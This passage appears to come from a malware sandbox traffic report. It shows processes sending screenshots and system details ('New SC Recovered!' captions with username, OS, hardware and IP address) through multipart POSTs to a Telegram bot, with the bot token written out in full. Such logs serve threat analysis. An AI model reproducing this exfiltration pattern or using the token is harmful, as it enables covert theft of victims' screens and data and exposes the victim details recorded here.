                                                                  2024-04-19 17:35:56 UTC16355OUTData Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
                                                                  Data Ascii: QEWI%nO6-yyA5}oK"C#DW1Z^rcRLX's4{WP)<lC02Nkq!81^;R*_/"m{+u1I}s>*?@3\bGk/{rFeQ_H|8QEQE((J)h
                                                                  2024-04-19 17:35:56 UTC15447OUTData Raw: a2 8a 29 80 51 45 14 00 51 45 14 00 94 51 45 03 0a 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 25 14 51 40 05 14 51 40 c2 90 d2 f6 a4 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 02 51 4b 49 40 c2 8a 28 a0 02 92 8a 29 8c 28 a2 8a 00 4a 28 cd 26 68 18 b4 94 94 50 16 0c fb 52 66 8a 28 18 52 52 d2 50 01 49 4b 49 40 c2 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 a2 8a 06 21 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 05 25 2d 14 14 25 14 52 50 08 5a 4a 28 a0 04 34 51 45 03 0a 4a 5a 4a 06 14 94 51 40 09 45 2d 25 03 0a 4a 5a 4a 06 14 94 51 40 05 25 2d 14 0c 4a 28 a2 81 85 25 14 94 00 b4 94 51 40 c3 8a 29 28 a0 02 8a 28 a0 62 51 45 14 0c 4a 28 a2 80 0a 28 a4 a6 30 fe 74 51 f9 50 69 0c 43 c7 34 51 45 30 13 f1 a3 8a 28 a0 61 49 c5 2d 27 14 80 3d e8 fa 51 45
                                                                  Data Ascii: )QEQEQEJZJ(QE%Q@Q@((RRPEPQKI@()(J(&hPRf(RRPIKI@(aIERRP0((!(aIKI@%-%RPZJ(4QEJZJQ@E-%JZJQ@%-J(%Q@)((bQEJ((0tQPiC4QE0(aI-'=QE
                                                                  2024-04-19 17:35:56 UTC1569OUTData Raw: 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 09 ff 00 e3 de 4f f7 4f f2 af 9e 6b e8 39 a6 88 c1 20 12 21 25 4f f1 0f 4a f9 f2 ae 26 73 0a dc d3 3c 49 3d 9d 8f d8 2e 6d 60 bf b3 ce e5 86 e1 72 14 fa 83 db f0 ac 3a 2a 88 37 35 3f 12 4f 79 63 f6 0b 6b 58 2c 2c f3 b9 a1 b7 5c 06 3e a4 f7 fc 6b 0e 8a 28 00 a2 8a 29 80 56 bd cf 89 f5 cb 8b a9 67 fe d5 bc 8b cc 72 fe 5c 57
                                                                  Data Ascii: }<B$}<B$}<B$}<B$}<B$}<B$}<BOOk9 !%OJ&s<I=.m`r:*75?OyckX,,\>k()Vgr\W
                                                                  2024-04-19 17:35:56 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 30 31 62 61 39 34 37 30 39 30 64 2d 2d 0d 0a
                                                                  Data Ascii: -----------------------------8dc801ba947090d--
                                                                  2024-04-19 17:35:56 UTC25INHTTP/1.1 100 Continue
                                                                  2024-04-19 17:35:56 UTC1485INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:35:56 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1096
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3445,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548156,"document":{"file_name":"user-618321 2024-05-29 20-12-27.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg11ZiKrfBrDeNVRXA4jltK-_5PnAAG1AAK5FwACi1IZUW6icK9SLLRiAQAHbQADNAQ","file_unique_id":"AQADuRcAAotSGVFy","file_size":12511,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg11ZiKrfBrDeNVRXA4jltK-_5PnAAG1AAK5FwACi1IZUW6icK9SLLRiAQAHbQADNAQ","file_unique_id":"AQADuRcAAotSGVFy","file_size":12511,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINdWYiq3waw3jVUVwOI5bSvv-T5wABtQACuRcAAotSGVFuonCvUiy0YjQE","file_unique_id":"AgADuRcAAotSGVE","file_size":66532},"caption":"New SC Recovered!\n\nTime: 05/29/2024 20:07:25\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  15192.168.2.549729149.154.167.2204437324C:\Users\user\AppData\Roaming\vZkoWbol.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-04-19 17:36:03 UTC238OUTPOST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc781440ce2291
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67138
                                                                  Expect: 100-continue
                                                                  2024-04-19 17:36:03 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 38 31 34 34 30 63 65 32 32 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 38 31 34 34 30 63 65 32 32 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 31 39 2f 32 30 32 34 20 31 34 3a 34 34 3a 31 35 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc781440ce2291Content-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc781440ce2291Content-Disposition: form-data; name="caption"New SC Recovered!Time: 05/19/2024 14:44:15User
                                                                  2024-04-19 17:36:03 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                                  Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
                                                                  2024-04-19 17:36:03 UTC16355OUTData Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
                                                                  Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
                                                                  2024-04-19 17:36:03 UTC16355OUTData Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
                                                                  Data Ascii: QEWI%nO6-yyA5}oK"C#DW1Z^rcRLX's4{WP)<lC02Nkq!81^;R*_/"m{+u1I}s>*?@3\bGk/{rFeQ_H|8QEQE((J)h
                                                                  2024-04-19 17:36:03 UTC15447OUTData Raw: a2 8a 29 80 51 45 14 00 51 45 14 00 94 51 45 03 0a 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 25 14 51 40 05 14 51 40 c2 90 d2 f6 a4 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 02 51 4b 49 40 c2 8a 28 a0 02 92 8a 29 8c 28 a2 8a 00 4a 28 cd 26 68 18 b4 94 94 50 16 0c fb 52 66 8a 28 18 52 52 d2 50 01 49 4b 49 40 c2 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 a2 8a 06 21 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 05 25 2d 14 14 25 14 52 50 08 5a 4a 28 a0 04 34 51 45 03 0a 4a 5a 4a 06 14 94 51 40 09 45 2d 25 03 0a 4a 5a 4a 06 14 94 51 40 05 25 2d 14 0c 4a 28 a2 81 85 25 14 94 00 b4 94 51 40 c3 8a 29 28 a0 02 8a 28 a0 62 51 45 14 0c 4a 28 a2 80 0a 28 a4 a6 30 fe 74 51 f9 50 69 0c 43 c7 34 51 45 30 13 f1 a3 8a 28 a0 61 49 c5 2d 27 14 80 3d e8 fa 51 45
                                                                  Data Ascii: )QEQEQEJZJ(QE%Q@Q@((RRPEPQKI@()(J(&hPRf(RRPIKI@(aIERRP0((!(aIKI@%-%RPZJ(4QEJZJQ@E-%JZJQ@%-J(%Q@)((bQEJ((0tQPiC4QE0(aI-'=QE
                                                                  2024-04-19 17:36:03 UTC1552OUTData Raw: a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 00 9f fe 3d e4 ff 00 74 ff 00 2a f9 e6 be 83 9a 68 8c 12 01 22 12 54 ff 00 10 f4 af 9f 2a e2 67 30 ad cd 33 c4 93 d9 d8 fd 82 e6 d6 0b fb 3c ee 58 6e 17 21 4f a8 3d bf 0a c3 a2 a8 83 73 53 f1 24 f7 96 3f 60 b6 b5 82 c2 cf 3b 9a 1b 75 c0 63 ea 4f 7f c6 b0 e8 a2 80 0a 28 a2 98 05 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 ac 8a 29 01 a7 2e b9
                                                                  Data Ascii: z(J*?>z(J*?>z(J*?>z(J*?>z(J*?>z(J*?>z(=t*h"T*g03<Xn!O=sS$?`;ucO(k\[/p(v).
                                                                  2024-04-19 17:36:03 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 38 31 34 34 30 63 65 32 32 39 31 2d 2d 0d 0a
                                                                  Data Ascii: -----------------------------8dc781440ce2291--
                                                                  2024-04-19 17:36:03 UTC25INHTTP/1.1 100 Continue
                                                                  2024-04-19 17:36:04 UTC1482INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:36:04 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1093
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3447,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548164,"document":{"file_name":"user-618321 2024-05-19 14-59-16.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg13ZiKrhLklJmH0vde4HngQgReObEUAArsXAAKLUhlRENuyLnpSwpcBAAdtAAM0BA","file_unique_id":"AQADuxcAAotSGVFy","file_size":12509,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg13ZiKrhLklJmH0vde4HngQgReObEUAArsXAAKLUhlRENuyLnpSwpcBAAdtAAM0BA","file_unique_id":"AQADuxcAAotSGVFy","file_size":12509,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINd2Yiq4S5JSZh9L3XuB54EIEXjmxFAAK7FwACi1IZURDbsi56UsKXNAQ","file_unique_id":"AgADuxcAAotSGVE","file_size":66515},"caption":"New SC Recovered!\n\nTime: 05/19/2024 14:44:15\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  16192.168.2.549730149.154.167.2204433472C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-04-19 17:36:10 UTC262OUTPOST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc84175737ff0b
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67138
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  2024-04-19 17:36:10 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 34 31 37 35 37 33 37 66 66 30 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 34 31 37 35 37 33 37 66 66 30 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 36 2f 30 33 2f 32 30 32 34 20 32 31 3a 34 36 3a 33 30 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc84175737ff0bContent-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc84175737ff0bContent-Disposition: form-data; name="caption"New SC Recovered!Time: 06/03/2024 21:46:30User
                                                                  2024-04-19 17:36:10 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                                  Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
                                                                  2024-04-19 17:36:10 UTC16355OUTData Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
                                                                  Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
                                                                  2024-04-19 17:36:10 UTC16355OUTData Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
                                                                  Data Ascii: QEWI%nO6-yyA5}oK"C#DW1Z^rcRLX's4{WP)<lC02Nkq!81^;R*_/"m{+u1I}s>*?@3\bGk/{rFeQ_H|8QEQE((J)h
                                                                  2024-04-19 17:36:10 UTC15447OUTData Raw: a2 8a 29 80 51 45 14 00 51 45 14 00 94 51 45 03 0a 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 25 14 51 40 05 14 51 40 c2 90 d2 f6 a4 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 02 51 4b 49 40 c2 8a 28 a0 02 92 8a 29 8c 28 a2 8a 00 4a 28 cd 26 68 18 b4 94 94 50 16 0c fb 52 66 8a 28 18 52 52 d2 50 01 49 4b 49 40 c2 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 a2 8a 06 21 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 05 25 2d 14 14 25 14 52 50 08 5a 4a 28 a0 04 34 51 45 03 0a 4a 5a 4a 06 14 94 51 40 09 45 2d 25 03 0a 4a 5a 4a 06 14 94 51 40 05 25 2d 14 0c 4a 28 a2 81 85 25 14 94 00 b4 94 51 40 c3 8a 29 28 a0 02 8a 28 a0 62 51 45 14 0c 4a 28 a2 80 0a 28 a4 a6 30 fe 74 51 f9 50 69 0c 43 c7 34 51 45 30 13 f1 a3 8a 28 a0 61 49 c5 2d 27 14 80 3d e8 fa 51 45
                                                                  Data Ascii: )QEQEQEJZJ(QE%Q@Q@((RRPEPQKI@()(J(&hPRf(RRPIKI@(aIERRP0((!(aIKI@%-%RPZJ(4QEJZJQ@E-%JZJQ@%-J(%Q@)((bQEJ((0tQPiC4QE0(aI-'=QE
                                                                  2024-04-19 17:36:10 UTC1552OUTData Raw: a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 00 9f fe 3d e4 ff 00 74 ff 00 2a f9 e6 be 83 9a 68 8c 12 01 22 12 54 ff 00 10 f4 af 9f 2a e2 67 30 ad cd 33 c4 93 d9 d8 fd 82 e6 d6 0b fb 3c ee 58 6e 17 21 4f a8 3d bf 0a c3 a2 a8 83 73 53 f1 24 f7 96 3f 60 b6 b5 82 c2 cf 3b 9a 1b 75 c0 63 ea 4f 7f c6 b0 e8 a2 80 0a 28 a2 98 05 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 ac 8a 29 01 a7 2e b9
                                                                  Data Ascii: z(J*?>z(J*?>z(J*?>z(J*?>z(J*?>z(J*?>z(=t*h"T*g03<Xn!O=sS$?`;ucO(k\[/p(v).
                                                                  2024-04-19 17:36:10 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 34 31 37 35 37 33 37 66 66 30 62 2d 2d 0d 0a
                                                                  Data Ascii: -----------------------------8dc84175737ff0b--
                                                                  2024-04-19 17:36:10 UTC25INHTTP/1.1 100 Continue
                                                                  2024-04-19 17:36:11 UTC1482INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:36:11 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1093
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
